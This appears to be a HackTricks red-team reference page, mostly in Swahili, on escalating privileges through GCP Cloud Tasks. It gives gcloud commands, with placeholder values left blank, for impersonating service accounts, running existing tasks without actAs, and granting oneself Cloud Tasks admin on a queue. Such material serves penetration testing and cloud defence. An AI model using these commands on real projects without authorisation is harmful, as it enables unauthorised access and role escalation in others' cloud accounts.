GCP - Cloud Tasks Privesc

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Cloud Tasks

cloudtasks.tasks.create, iam.serviceAccounts.actAs

Mshambuliaji mwenye ruhusa hizi anaweza kuiga akaunti nyingine za huduma kwa kuunda tasks ambazo zinaendesha kwa utambulisho wa akaunti ya huduma iliyotajwa. Hii inaruhusu kutuma authenticated HTTP requests to IAM-protected Cloud Run or Cloud Functions services.

Create Cloud Task with service account impersonation ```bash gcloud tasks create-http-task \ task-$(date '+%Y%m%d%H%M%S') \ --location us-central1 \ --queue \ --url 'https://.us-central1.run.app' \ --method POST \ --header 'X-Hello: world' \ --body-content '{"hello":"world"}' \ --oidc-service-account-email @.iam.gserviceaccount.com ```

cloudtasks.tasks.run, cloudtasks.tasks.list

Mshambuliaji mwenye ruhusa hizi anaweza kuendesha task zilizopangwa zilizopo bila kuwa na ruhusa kwenye service account inayohusishwa na task. Hii inaruhusu kutekeleza task ambazo zilianzishwa awali na service accounts zilizo na ruhusa za juu.

Endesha Cloud Task iliyopo bila ruhusa ya actAs ```bash gcloud tasks run projects//locations/us-central1/queues//tasks/ ```

Mhusika anayetekeleza amri hii hahitaji ruhusa iam.serviceAccounts.actAs kwenye akaunti ya huduma ya kazi. Hata hivyo, hili linamruhusu tu kuendesha kazi zilizopo — halimpa uwezo wa kuunda au kurekebisha kazi.

cloudtasks.queues.setIamPolicy

Mshambuliaji mwenye ruhusa hii anaweza kujipa au kumpa wahusika wengine majukumu ya Cloud Tasks kwenye queues maalumu, na hivyo kuweza kupanua haki hadi roles/cloudtasks.admin ambayo inajumuisha uwezo wa kuunda na kuendesha kazi.

Kumpa jukumu la admin wa Cloud Tasks kwenye queue ```bash gcloud tasks queues add-iam-policy-binding \ \ --location us-central1 \ --member serviceAccount:@.iam.gserviceaccount.com \ --role roles/cloudtasks.admin ```

Hii inamruhusu mshambuliaji kumpa service account yoyote anayedhibiti ruhusa kamili za Cloud Tasks admin kwenye foleni.

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks